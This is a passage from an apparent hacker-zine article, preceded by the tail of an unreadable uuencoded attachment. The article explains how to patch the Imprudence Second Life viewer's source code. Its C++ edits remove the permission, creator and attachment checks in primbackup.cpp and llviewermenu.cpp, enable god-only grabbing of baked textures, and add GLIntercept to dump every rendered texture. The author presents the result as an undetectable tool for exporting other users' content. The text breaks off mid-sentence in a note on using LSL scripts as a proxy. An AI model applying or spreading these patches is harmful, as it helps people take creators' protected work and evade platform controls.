M$K!QVZG!8]N1,,9M=P44&WNN\#]>!EH2.+9GHQP-P:;`>&MW;\_J-GF[L482 MV_J(N@PW!M<`[9RJXR=*D@\,#G=P48R28SLY(3&/PE_U:8\;0LN9E6$4;#LL M$.[1''<*.^=A!JO&F,#%8PT=?K);7I-K+6=)>DNM);<=JLJB:>\&ML=M.'O= MK=H$9_=:KHXHL3KW2?'.=^5\KA8#^YF6!LWQEW2.I\#9G)4I MD"-/[2B)(4[2S,I=8B*<]N!NX7+RTO/QH-N>?[>EW$*W/I,LQGJ]0^R[ M`#*U<*'-0L,:DBF5#J5>"?19CAZ`OD=U4N+@[HAFF\8M5(3H#@P[30X_0+R2 M&TFMLE$835O;!]J_Q+;W'IPWIUIRZR3M-+US@83T#LG[P\5 M-(%?E#RI*R[*YG5X(V(-K.V(\RUG<"Q6,GZJ!3U>+&[1\:Y&0)RCAZB01X_1 M9ER%$)7!:/E#,/T8.C,'K.=8TP>&TX5_QPI%MSVG/V8G9XT9;6MMID-`NV7V MNU=G#@7Q8XB=W$!_VS:T[7@XM0-^$_V&FU+W!S8B_JT?CA\Y_.A4#A\^;OCIQ9=!/_^BX0T?X#'\;$QX'(Z+=Z]?G_SM,<#E MR$?RY=V;-U^\RLN_GWW9*G'"%^)X^>;HXN*+D-",K@2S107.^G?"F# MU5P%I"D/`O`=P,)APW"?^0N>Y=):QV4455$H>B<.#.BQEL%^PBA=9[>P5]0# M#5U/Q;`FVL$8OF;C*0@+T)'4Z3X;`O%;B.&(#`PULD*'XVF6%(F?1-X=<4WG MWYTP_S_VH?N?((-SZ'>X^%&?^^]_=@?[P_W6_<_NTV?_N?_Y0SYWW_\8H=BX M^)$]YD*E?DE$+C,UYB*3T_^0^Q]]^Y&O<_T5;%22%OI7L0"/!UU",[1&9:-) MKZ;30>`K.6NO!RI/G:.`WD)G"MCQ5?[,U&_ M!2R,SW"\B;]ME]T#.\2Q)LJY?RPG.G3L?O_8.8[%&Q`8"32+X/[A"QR^2/(" M=D,O\=X)2P,?_?"'$11$>U%@Q%<P=6&N%HS+J+^+$$^3A%!;CWCPQHK1!$ M3X'KRUQM);HO82:"J19##'!M1`I[Y"+S7>2JBTN9T`RZF(L@V%!3T-6(^'(6 M0(`T:HG&53ZA2(^BX4:/]T&L. MB/$,&0^>R1)-$T23#D1.E&&IWS>BT6&(Q37W)=SW15IP5'2U4I)V5#D*8'9> MXT5YC.(#YDSY?3](!V351?WI(OR:5F&URC="%>9_L M&GDF3Q!/_G'@:/&@X^9J.)JXEB73!VU15'**J8Y'1`?62(.Y"PB,(.$1MRA< MFDH0WV(*Q^]TQH-IF?-KX5@G,5CT,#"+LZ08Z',().`SVV&?;$1@HUS;L!BE MU7B2)[!LQ1R3>]HY*^FB;`YQ`1V>S.[I6,!H9$@@2BSA!58A-_ODY4WM4E4^.#D724O.PJUMI'&WZ`Z`DP)"8T%+X/` MNCE-J]OUPCPO9SE=-Q6.%D9,X7C/4>2K\L5(5$)GP!CFY`=QL$IX0CMEM? M/LHF2B(:)V.;`<=(,^8!;MQI`YOV^TI+UQ;<E7=U'+$59SQI3]MP)>^<:`S521P:`:%CA.Z<=`F$"0SU22N=GRDG`9XB'P"# M+)[1V@.-HZ;P0\OD:C!A?Y+ND=OHU:HD*?JN?>-%-'&BJNC!%BBWR]M@:5VO M<*\V*1WI,T[<3JM353ML]\(;C\EKJMUAU4'85]8G$P=]QKJ/3]5.E%GTV9K8 MGBP_=,RXL4%5A5`3Z8R:B>-[=E;GU%LG7X.P2IZJ,:4N-CB8F8\NR5*$= MWK&.+57)^`EY^;FO6#]]G_<_:9=ZBG[T9^O0U-#I0KUY&B"AUYM+; MYK&_P&_=3Y]TUVZ[SV6?@+HISS*^_MQ]\?FS`0\4-@RN9BM2.+Y3?;8;Z<8: MQH\RUX,[0!EJQQ7_E55*IV#^J*".C*#3M&4Z:IU@_)7:M*EHW^Z;4]D_F`0_ M;&7ZM;+"Q&961^=UG4W#YRH"78W5W6HO:JU5$%]O-3)4:ZO)=YL(4)AB9P^++!I5W MTI;`&1YX;>(-.Z"[P8XV+V'`?>RHF\>'^/+%YXG1?P79^7M28E4A+#Z6E5CM M<^L%(EG+4<@]9:ET-Y6L8W\F;ZGA&\80,SZ+UFS%8[H(PEI]5!(#6XD\W0OU MP!6LZ/K7=T4!,5?JF%+59@F-$-:"?"2>2'\(#/115:TL*T#\3&",@NJ10+R% M,TK,9N;RCD@#0(E2/C^9-:S:0:-HKL_S-`H+$#^7S2&L=9E8IL4:RZY]ICV+ M]G^5Z^48''B2HZ$U-<';8.*9[F$28G=O#_^8^S.)2CDZ>.LUDF44$(#A+RHH MZBJY:V,E2_T@VA'B>_V:L-Z'UOKS8/=O%OLS,\A=-MQO$%`)?JV0#Z-&1"E/ M%P>_DD`@!%GP`]M.U#F:1F6\J235P8#)K")$JJ@Z%29C;:JNHI%CJ?DJ)/>) M<)*E9X=L4`_RJU&2"U5/R'JU.I+:.*1<_^Q6F0O5-B"$>J%U5#,PH1_T^'4H MP-74BY1I'+D0*>4R!)/3E7Y8UCML''7,U0H[,*'9/.+7^2'K%>R`;^0A#TTC MWAW(E#\%O(?L2E\!2`C@G\&IUX2*QV`O8P=A>DC$7]+C$QTO)IU@;5N MZ+'K1PD>>R5259V5Q*I>^]#^@LKE7C!_D=#[E!A02`.: M)SMQ>73!+& MU=:A3V7N]=#>TADB"Y^11VF9I<`/=7=OA)!<`CRN2LI&]'0HU8O80243ZA@* MTWX1!?&A4;M+X]#)UPUU8O7.(:VTO=*1Z"W8P?O)H'>;MH_O,^4(')Y?8!/,PP.64XG MLH(C-HRZ%-JE8FS+!FAN!K#HZBX!X59+/6*M+M21'-B(HHPH/'84KQ$_^7*` M6<7P(-V:R:`0(-:U(E+I2:!NK&'*[0A)@&`6X;$AQK'T;1?"U\<*Q+^R;_4] MH*&=P8B]@W&8R`IC(1\321\%^#8+BXQG:_DD1I7CI9AGO9?'/CO`"14MXAH; M==Q[R,&]+QR[`&??[KZHXDY)$"IPTUR3:;Z1CM8EUKDDL2YAQ0U"(PO\HOMW MNDW"PFA\\H,*6A7:YOAV#6R-7/>1#'%H3,/98Y6SYS3OZ+OR78[BN[S95GJ) M<)?LX*>CE]ML-#3G+^332:4:.9*YXFO&Y2,]&@9G`'D&8,XIIT@E2O@(YU>1 M)7B=7TA!JKQ;[0/+ZDF0E050#=B0G`6=&.R_V0')!:M.*"K5QD84L4R?;2`0 M:*RD"^ZQ$Y6ZEDE0]$%U&ARI@E,,QI84E*B'<-K_P6-]2YIU*7+\6SOJJS-? M]35ZE&=`7M8M.$KH<>/]MA&*$%3LIN`:8U#/6-R&E,I?9RBS1M0D+>,'EU8GN]OYGE`+YUZ%\ MX9SD^FFS7V9!F&$PFNI1W_%<5(D<5RV_:C%H$BJ?5D^C-S-%33A>]55%%A3Q M4L!,I0,U]JJ3",M\U-,#"$ATL;B\ZL*'V]*MS8L`;%U5*KZC,B"4$9"/P2B7PAD(:LG*>K1>=V32^ZA"PPX M^Q(A&D>5:YKA`YG&TUG&[F2#MS')S*$"=HD,WZHK?&@O&R/PK*L_"M./WA2G MVI3(MY%Z9O,E0=%^9$5(@`(7'8),%]4KFF3%A[/YA@'[ZQ1C*F%SE*IL=2KX MS3'RSE\)F*=@;9*7@MS5M@`36JT5U[A472A5&_8E#*)6*E43AK\JA&XH0#/A MZ;25QZL:6JG1"AV(,@TFK3:>-VAJABT3>40%9?L1#27F9$J9@SLLO0Z"JIU@!6>+QDGV$*R\`D;U4:AY M4[P\IN(+K$[!!MRXE2Q<*5/0@/H`V:)&3"H$N&E!,D62VMM&>X!QHGA[TI[`I0M3`S35*6(>,5`UK: M%#70\32-0I_^AQ[]V]YJM>H1VC*#!:"%#+8@_VB>M!$:CW+T/QA*H5Q/*R*^`U?FA(,4HK@MNB^?.,JG],ADH8`.CCIJ@%* MWD%)([8AJVV&;7LD)C$BX(KF;_$<"?TE2$,2-$1U&U%-O/J1@$OZV!)GT"WS M%@IW%`,GT'B,C+3S+M6X=V@T6]=JR*=5A;@M9!LWRDD&Q6NR_$>$`H8/PF&N MX/JX^1/*4KA%(L+;Q MY1_M'%U/VS#PN?D55O8P1RT)+71(E#QL%8('MDECDR:Q*D)MJD:D*6JI!!K[ M[[L[V[&=AI8B!FCR/:#0V.?SVW M(]8VX)!9H:]6/X70]S%\O8SFY%%^`%]*MV+78ONU6T%7(_V,J=7CNC`0')9# M#^QI2F%,Z%8ROU>C@^LB@EM%`>F/I7;4!/2,(--J!(M$>"#))(V!KT3;0'V] M`^-W>@SVIG'&U@7#[`A/;6!-Q-V\#,O=H.!*$OJT)@FR+DGD%_353%L'CP"R M_XW4C'\QQO;U_SH?NJ[^WXM`=?U-+^ISC;'!_]/9.^A4UK_;/N@Z_\]+0!19 MCG,SUB$#;F4=/VCZ!.\-]=K&?;.2^E63WX4D![\]H4O,V3#%:Z0Q*^NX@6%R MG%/\;O'IKH^&*=Z.Y?X-ZH-^T-.B%[0TCBBR>+?'LB/"%`J='OYO-F&4!K[' MCGU0*%"EQS87V2!4O\$P/<]K9&,N8R>+C\4=5V\EM8A(T8MA%@,/:,F`X@OZ M9?1C3S1?W\A\%.&9/ACO(PX#!!)!%)TIC[PN8G6(P0-2YT2Z%,6!+JDB"*$1 MV2>`)32HV(K!U`T#_+OP+,R^/UZC7+%B.4T>CQ2-3$3JB0E]2^7M''((T(JQ M\ZOLVJAFLM\RM'EJ-LN7TX(IR[6R]ONX]B5-U?4O7U06'4WBG;V>G)PD#N,0 M,S@C&<9XU!:6M22))V/&N?H]5)$'-28J4&T6L/M[QM5VIP(S/@.3N@%:5XC] MQG.\\)#/A`$;3N;I.*9#TO2323BYF?J"*K3AMNCU#N\AJ&%['LP)F4V*\0UE MNH^%0:6VN7"2R#IJNM;9<)(.KT)]D*NGHB5:`&MKCB`[DOTKBP"G"_N&8!>D MMU_AJ&$C3.#`O."=MCI>_G&6.3_.]V MNE7Y#\]._K\$@'BVE_SA?)(WK`]@B%[J`V(VRA/`\0WYO.BA/=!2Y'_[4)^D M2IH;;BZ=R2-3'$1<'V\',#Z:I0N\2985PWPY2E6`*-`LKS"S3,EN&7@,/&<5'J9<([/%G8W/6"+^6:O%DNIJ*?M6`P" M8@OPY<<<]B[H$K!\:H8HI$!S`MX!)>B9BZ)S]$9=JC*=7&PKS4_A/E30R^!'. MKM."^T@$3)C&1!&G=C,U@?DK#Y-PROM]PZV/^3@;G=[F$JS!)XZ`WY)3E$=B M8]]"9+(A)53768QF=BI&7*`4JV>S&S>2O=]NI_FIY-XRSR4OC!\?9*EL([C* M_)/CDJNBA$*E&1%&8Z@W4I=0#50JSG?04)QJX<"!`P<.'#APX,"!`P<.'#AP 2X,"!`P<.7A_^`BMJX``` ` end |=[ 0x05 ]=---=[ Hacking the Second Life Viewer For Fun & Profit - Eva ]-=| |=-----------------------------------------------------------------------=| |=------------------------=[ 01110010011000010110 ]=---------------------=| |=------------------------=[ 01100110010101101110 ]=---------------------=| |=------------------------=[ 10010110111001110011 ]=---------------------=| |=------------------------=[ 01110011011001010111 ]=---------------------=| |=-----------------------------------------------------------------------=| Index ------[ N. Preamble ------[ I. Part I - Objects ------[ II. Part II - Textures II. i. Textures - GLIntercept ------[ III. Postamble ------[ B. Bibliography ------[ A. Appendix |=-----------------------------------------------------------------------=| ------[ N. Preamble Second Life [1] is a virtual universe created by Linden Labs [2] which allows custom content to be created by uploading different file formats. It secures that content with a permission mask "Modify / Copy / Transfer", which allows creators to protect their objects from being modified, copied or transferred from avatar to avatar. The standard viewer at the time of this writing is 2.x but the 1.x old codebase is still around and it is still the most wide-spread one. Then, we have third party viewers, and those are viewers forked off the 1.x codebase and then "extended" to modify the UI and add features for convenience. Second Life works on the principle of separately isolated servers called SIMs (from, simulator, now recently renamed to "Regions") which are interconnected to form grids. The reasoning is that, if one SIM goes down, it will become unavailable but it will not take down the entire grid. A grid is just a collection of individual SIMs (regions) bunched together. Avatars are players that connect to the grid using a viewer and navigate the SIMs by "teleporting" from one SIM to the other. Technically, that just means that the viewer is instructed to connect to the address of a different SIM. A viewer is really just a Linden version of a web browser (literally) which relies on loads of Open Source software to run. It renders the textures around you by transferring them from an asset server. The asset server is just a container that stores all the content users upload onto Second Life. Whenever you connect to a SIM, all the content around you gets transferred to your viewer, just like surfing a website. There are a few content types in Second Life that can be uploaded by users: 1.) Images 2.) Sounds 3.) Animations Whenever I talk about "textures", I am talking about the images that users have uploaded onto Second Life. In order to upload one of them onto Second Life, you have to pay 10 Linden dollars. Linden maintains a currency exchange from Linden dollars to real dollars. At any point, depending on the build permission of the SIM you are currently on, you are able to create objects. Those are just basic geometric shapes called primitives, (or prims for short) such as cubes, spheres, prisms, etc... After you created a primitive, you can decorate it with images or use the Linden Scripting Language LSL [3] to trigger the sounds you uploaded or animate avatars like yourself. There is a lot to say about LSL, but it exceeds the scope of the article. You can also link several such primitives together to form a link set which, in turn, is called an object. (LISP fans dig in, Second Life is all about lists - everything is a list.) Coming back to avatars, your avatar has so called attachment-points which allow you to attach such an object to yourself. Users create content, such as hats, skirts, and so on and they sell them to you and you attach them to these attachment points. In addition to that, there are such things called wearables. Those are different from attachments because they are not made up of objects but they are rather simple textures that you apply to yourself. Those do not have any geometric properties in-world and function on the principle of layers, hiding the layer underneath. Finally, you have body parts which are also just textures. For example, eyes, your skin. The wearable layers get superimposed (baked) on you. For example, if you wear a skin and a T-shirt, the T-shirt texture will hide part of the skin texture underneath it. We are going to take a standard viewer: we will use the Imprudence [4] viewer, the current git version of which has such an export feature and we are going to modify it so it will allow exports of any in-world object. Later on, the usage of GLIntercept [7] will be mentioned since it can be used to export the wearables and the body parts mentioned which are just textures. Why does this work? There are a number of restrictions which are enforced by the server, and a number of actions that the server cannot control. For example, every action you trigger in Second Life usually gets a permission check with the SIM you are triggering the action on. Your viewer interprets the response from the SIM and if it is given the green light, your viewer goes ahead and performs the action you requested. Say, for example, that the viewer does not care whether the SIM approves it or not and just goes ahead and does it anyway. Will that work? It depends whether the SIM checks again. Some viewers have a feature called "Enable always fly.", which allows you to fly around in no-fly zones which is an instance of the problem. The SIM hints the viewer that it is a no-fly zone, however the viewer ignores it and allows you to fly regardless. Every avatar is independent in this aspect and protected from other avatars by a liability dumping prompt. Whenever an avatar wants to interact with you, you are prompted to allow them permission to do so. However, the graphics are always displayed and your viewer renders other avatars without any checks. One annoyance, for example, is to spam particles generated by LSL. Given a sufficiently slow computer, your viewer will end up overwhelmed and crash eventually. These days, good luck with that... But how do we export stuff we do not own, doesn't the server check for permissions? Not really, we are not going to "take" the object in the sense of violating the Second Life permissions. We are going to scan the object and note down all the parameters that the viewer can see. We are then going to store that in an XML file along with the textures as well. This will be done automatically using Imprudence's "Export..." feature. Whenever you upload any of the content types mentioned in the previous chapter, the Linden asset server generates an asset ID which is basically an UUID that references the content you uploaded. The asset server (conveniently for us) does not carry out any checks to see whether there is a link between an object referencing that UUID and the original uploader. Spelled out, if you manage to grab the UUID of an asset, you can reference it from an object you create. For example, if a user has uploaded a texture and I manage to grab the UUID of the texture generated by the asset server, then I can use LSL to display it on the surface of a primitive. It is basically just security through obscurity (and bugs)... ------[ I. Part I - Objects The "Export..." feature on the viewers we attack is not an official feature but rather a feature implemented by the developers of the viewers themselves. That generally means that the viewer only implements certain checks at the client level without them being enforced by the server. The "Export..." feature is just a dumb feature which scans the object's measurements, grabs the textures and dumps the data to an XML file and stores image files separately. Since it is a client-side check, we can go ahead and download Imprudence (the same approach would work on the Phoenix [5] client too) and knock out all these viewer checks. After you cloned the Imprudence viewer from the git repo, the first file we edit is at linden/indra/newview/primbackup.cpp. Along the very fist lines there is a routine that sets the default textures, I do not think this is needed to make our "Export..." work, but it is a good introduction to what is going on in this article: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ void setDefaultTextures() { if (!gHippoGridManager->getConnectedGrid()->isSecondLife()) { // When not in SL (no texture perm check needed), we can // get these defaults from the user settings... LL_TEXTURE_PLYWOOD = LLUUID(gSavedSettings.getString("DefaultObjectTexture")); LL_TEXTURE_BLANK = LLUUID(gSavedSettings.getString("UIImgWhiteUUID")); if (gSavedSettings.controlExists("UIImgInvisibleUUID")) { // This control only exists in the // AllowInvisibleTextureInPicker patch LL_TEXTURE_INVISIBLE = LLUUID(gSavedSettings.getString("UIImgInvisibleUUID")); } } } +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ The viewer uses a method isSecondLife() to check if it is currently on the official grid. Depending on the outcome of this method, the viewer internally takes decisions on whether certain things are allowed so that the viewer will conform to the Linden third-party viewer (TPV) policy [6]. The TPV policy is a set of rules that the creator of a viewer has to respect so that the viewer will be granted access to the Second Life grid (ye shall not steal, ye shall not spam, etc...). However, these checks are client-side only. They are used internally within the viewer and they have nothing to do with the Linden servers. What we do, is knock them out so that the viewer does not perform the check to see if it is on the official grid. In this particular case, we can knock out the check easily by eliminating the if-clause, like so: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ void setDefaultTextures() { //if (!gHippoGridManager->getConnectedGrid()->isSecondLife()) //{ // When not in SL (no texture perm check needed), we can // get these defaults from the user settings... LL_TEXTURE_PLYWOOD = LLUUID(gSavedSettings.getString("DefaultObjectTexture")); LL_TEXTURE_BLANK = LLUUID(gSavedSettings.getString("UIImgWhiteUUID")); if (gSavedSettings.controlExists("UIImgInvisibleUUID")) { // This control only exists in the // AllowInvisibleTextureInPicker patch LL_TEXTURE_INVISIBLE = LLUUID(gSavedSettings.getString("UIImgInvisibleUUID")); } //} } +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Without this check, the viewer assumes that we are on any grid but the Second Life grid. You probably can notice that these checks are completely boilerplate. Let us move on to the next stop. Somewhere in linden/indra/newview/primbackup.cpp you will find the following: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ bool PrimBackup::validatePerms(const LLPermissions *item_permissions) { if(gHippoGridManager->getConnectedGrid()->isSecondLife()) { // In Second Life, you must be the creator to be permitted to // export the asset. return (gAgent.getID() == item_permissions->getOwner() && gAgent.getID() == item_permissions->getCreator() && (PERM_ITEM_UNRESTRICTED & item_permissions->getMaskOwner()) == PERM_ITEM_UNRESTRICTED); } else { // Out of Second Life, simply check that you're the owner and the // asset is full perms. return (gAgent.getID() == item_permissions->getOwner() && (item_permissions->getMaskOwner() & PERM_ITEM_UNRESTRICTED) == PERM_ITEM_UNRESTRICTED); } } +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ This checks to see if you have full permissions, and are the owner and the creator of the object you want to export. This only applies to the Second Life grid. If you are not on the Second Life grid, then it checks to see if you are the owner and have full permissions. We will not bother and will modify it to always return that all our permissions are in order: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ bool PrimBackup::validatePerms(const LLPermissions *item_permissions) { return true; } +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ The next stop is in the same file, at the following method: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ LLUUID PrimBackup::validateTextureID(LLUUID asset_id) { if (!gHippoGridManager->getConnectedGrid()->isSecondLife()) { // If we are not in Second Life, don't bother return asset_id; } LLUUID texture = LL_TEXTURE_PLYWOOD; if (asset_id == texture || asset_id == LL_TEXTURE_BLANK || asset_id == LL_TEXTURE_INVISIBLE || asset_id == LL_TEXTURE_TRANSPARENT || asset_id == LL_TEXTURE_MEDIA) { // Allow to export a grid's default textures return asset_id; } LLViewerInventoryCategory::cat_array_t cats; // yadda, yadda, yadda, blah, blah, blah... +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ There is a complete explanation of what this does in the comments. This checks to see whether you are in Second Life, and if you are, it goes through a series of inefficient and poorly coded checks to ensure that you are indeed the creator of the texture by testing whether the texture is in your inventory. We eliminate those checks and make it return the asset ID directly: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ LLUUID PrimBackup::validateTextureID(LLUUID asset_id) { return asset_id; } +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Once you compile the modified viewer, you will be able to export any object, along with its textures that you can see in-world. The next step is to modify the skin (i.e. Imprudence's user interface) so that you may export attachments from the GUI. First, let us enable the pie "Export..." button. I will assume that you use the default skin. The next stop is at linden/indra/newview/skins/default/xui/en-us/menu_pie_attachment.xml. You will need to add: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Now, we need to enable it for any avatar at linden/indra/newview/skins/default/xui/en-us/menu_pie_avatar.xml. You will need to add: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ After that, we must add them so the viewer picks up the skin options. We open up linden/indra/newview/llviewermenu.cpp and add in the avatar pie menu section: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ // Avatar pie menu ... addMenu(new LLObjectExport(), "Avatar.Export"); +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ We do the same for the attachments section: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ // Attachment pie menu ... addMenu(new LLObjectEnableExport(), "Attachment.EnableExport"); +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Now we are set. However, the viewer performs a check in "EnableExport" in linden/indra/newview/llviewermenu.cpp which we need to knock out: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ class LLObjectEnableExport : public view_listener_t { bool handleEvent(LLPointer event, const LLSD& userdata) { LLControlVariable* control = gMenuHolder->findControl(userdata["control"].asString()); LLViewerObject* object = LLSelectMgr::getInstance()->getSelection()->getPrimaryObject(); if((object != NULL) && (find_avatar_from_object(object) == NULL)) { // yadda, yadda, yadda, blah, blah, blah... +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ The code initially checks whether the object exists, if it is not worn by an avatar, and then applies permission validations to all the children (links) of the object. If the object exists, if it is not worn by an avatar and all the permissions for all child objects are correct, then the viewer enables the "Export..." control. Since we do not care either way, we enable the control regardless of any checks. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ class LLObjectEnableExport : public view_listener_t { bool handleEvent(LLPointer event, const LLSD& userdata) { LLControlVariable* control = gMenuHolder->findControl(userdata["control"].asString()); LLViewerObject* object = LLSelectMgr::getInstance()->getSelection()->getPrimaryObject(); if(object != NULL) { control->setValue(true); return true; // yadda, yadda, yadda, blah, blah, blah... +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ I have left the NULL check for the object since if you happen to mis-click and select something other than an object, then the "Export..." pie menu will be enabled and your viewer will crash. More precisely, if you instruct the viewer to export something using the object export feature, and it is not an object, the viewer will crash since there are no checks performed after this step. Further on in linden/indra/newview/llviewermenu.cpp there is another test to see whether the object you want to export is attached to an avatar. In that case, the viewer considers it an attachment and disallows exporting. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ class LLObjectExport : public view_listener_t { bool handleEvent(LLPointer event, const LLSD& userdata) { LLViewerObject* object = LLSelectMgr::getInstance()->getSelection()->getPrimaryObject(); if (!object) return true; LLVOAvatar* avatar = find_avatar_from_object(object); if (!avatar) { PrimBackup::getInstance()->exportObject(); } return true; } }; +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Again, we proceed the same way and knock out that check which will allow us to export objects worn by any avatar: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ class LLObjectExport : public view_listener_t { bool handleEvent(LLPointer event, const LLSD& userdata) { PrimBackup::getInstance()->exportObject(); return true; } }; +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ These changes will be sufficient in order to transform your viewer into an undetectable tool that will allow you to export any object along with the associated textures. There are indeed easier ways, for example toggling God mode from the source code and bypassing most checks. However, that will be discussed in the upcoming full article, along with explanations on what Linden are able to detect and wearable exports. Alternatively, and getting closer to a "bot", there are ways to program a fully non-interactive client [11] that will export everything it sees automatically. This will also be covered in the upcoming article since it takes a little more than hacks. The principle still holds: "who controls an asset UUID, has at least permission to grab the asset off the asset server". ------[ II. Part II - Textures In the first part we have talked about exporting objects. There is more fun you can have with the viewer too, for example, grabbing any texture UUID, or dumping your skin and clothes textures. What can we do about clothes? If you have an outfit you would like to grab, with the previous method you will only be able to export primitives without the wearable clothes. How about backing up your skin? The 1.x branch of the Linden viewer has an option, disabled by default and only accessible to grid Gods, which will allow you to grab baked textures. Grid Gods are essentially Game Masters and in the case of Second Life, they consist of the "Linden"s, which are Linden Labs employees represented in-world by avatars, conventionally having "Linden" as their avatar's last name. We open up linden/indra/newview/llvoavatar.cpp and we find: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ BOOL LLVOAvatar::canGrabLocalTexture(ETextureIndex index) { // Check if the texture hasn't been baked yet. if (!isTextureDefined(index)) { lldebugs << "getTEImage( " << (U32) index << " )->getID() == IMG_DEFAULT_AVATAR" << llendl; return FALSE; } if (gAgent.isGodlike() && !gAgent.getAdminOverride()) return TRUE; // yadda, yadda, yadda, blah, blah, blah... +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Aha, so it seems that grid Gods are permitted to grab textures. That is fine, so can we: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ BOOL LLVOAvatar::canGrabLocalTexture(ETextureIndex index) { // Check if the texture hasn't been baked yet. if (!isTextureDefined(index)) { lldebugs << "getTEImage( " << (U32) index << " )->getID() == IMG_DEFAULT_AVATAR" << llendl; return FALSE; } return TRUE; if (gAgent.isGodlike() && !gAgent.getAdminOverride()) return TRUE; // yadda, yadda, yadda, blah, blah, blah... +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ But that is not sufficient. The 1.x viewer code has an error (perhaps intentional) which will crash the viewer when you try to grab the lower part of your avatar. In the original code at linden/indra/newview/llviewermenu.cpp, we have: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ else if ("lower" == texture_type) { handle_grab_texture( (void*)TEX_SKIRT_BAKED ); } else if ("skirt" == texture_type) { handle_grab_texture( (void*)TEX_SKIRT_BAKED ); } +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Which must be changed to: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ else if ("lower" == texture_type) { handle_grab_texture( (void*)TEX_LOWER_BAKED ); } else if ("skirt" == texture_type) { handle_grab_texture( (void*)TEX_SKIRT_BAKED ); } +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ You are free to recompile and go to the menu and dump the textures on you, including your skin. To grab your skin, you can undress your avatar and grab the textures. You can then export them using the method from Part I. For clothes, you would do the same by clothing your avatar, grabbing the relevant textures and then exporting them using the method from Part I. You might notice that the texture that will be dumped to your inventory is temporary. That is, it is not an asset and registered with the asset server. Make sure you save the texture, or, if you want to save a bunch of them, consider reading the first part of the article and place the textures on a primitive and export the entire primitive. Since the textures are baked, they represent an overlay of your skin and your clothes. If you want to extract just the clothes, you might need to edit the grabbed textures in a graphics editing program to cut out the skin parts. However, it might be possible to use a transparent texture for your skin when you grab the textures. In that case, you will not have to edit the clothes at all. ------[ II. Part II - Textures II. i. Textures - GLIntercept The GLIntercept method involves grabbing a copy of GLIntercept and replacing the .dll file with the GLIntercept one. By doing that, when you run the Second Life viewer, all the textures will be stored to your hard drive in the images directory. It is a resource consuming procedure because any texture that your viewer sees is saved to your hard-drive. Therefore, if your only interest is to allot a collection of textures, then get GLIntercept and, after installing it, replace the opengl .dll from your viewer directory with the one from GLIntercept. If you cannot find the viewer's opengl .dll, then just copy it as a new file because the viewer will pick it up. I recommend setting your graphics all the way to low and taking it easy because in the background, the GLIntercept .dll will create an images directory and dump all the possible textures, including the textures belonging to the UI. There is a lot of fuss going on about GLIntercept. Some strange people say it does not work anymore and some funny people come up with ideas like encrypting the textures. The principle that GLIntercept works on is trivial to the point of making the whole fuss meaningless. GLIntercept, when used in conjunction with the viewer is an extra layer between your viewer and opengl. Anything that your graphics card renders can be grabbed - together with other similar software [8], the same effect described in this article, however it would require you to convert the structures to the Second Life format. The usage of GLIntercept is not restricted to Second Life, you can go ahead and grab anything you like from any program that uses opengl. It literally puts a dent (crater?) into content stealing, the important phrase being: "anything that your graphics card renders, can be grabbed". ------[ IV. Postamble Second Life is a vanity driven virtual universe which is plagued by the most horrible muppets that fake anonymity could spawn. The Lindens maintain full control and all the content you upload automatically switches ownership to Linden Labs via the Terms of Service which make you renounce your copyright. Not only that, but there are plenty of rumours you are tracked and they have a dodgy "age-verification" system in place which forces you to send your ID card to be checked by "a third party". Under these circumstances, it is of course questionable what they do with that data and whether they link your in-world activities to your identity. There is more that could be potentially done, the viewers are so frail and incredibly poorly coded from all perspectives and certainly not the quality you would expect from an institution that makes billions of shineys. There have been exploits before such as Charlie Miller's Quicktime exploit [9] which was able to gain full control of your machine (patched now) and Michael Thumann's excellent presentation which goes over many concepts of Second Life as well as how they can be abused [10]. One of the further possibilities I have been looking into (closely related to Michael Thumann's presentation) is to use LSL and create an in-world proxy that will enable your browser to connect to a primitive in-world and bounce your traffic. There is a limitation imposed on the amount of information an LSL script can retrieve off the web, however I am still looking into way to circumvent that. Essentially the idea would be to use the Linden Labs servers as a proxy to carry out all the surfing. At the current time of writing this article, I do have a working LSL implementation (you can see an example of that in [A. 1]) that can grab 2kb off any website (this is a limitation imposed by the LSL function 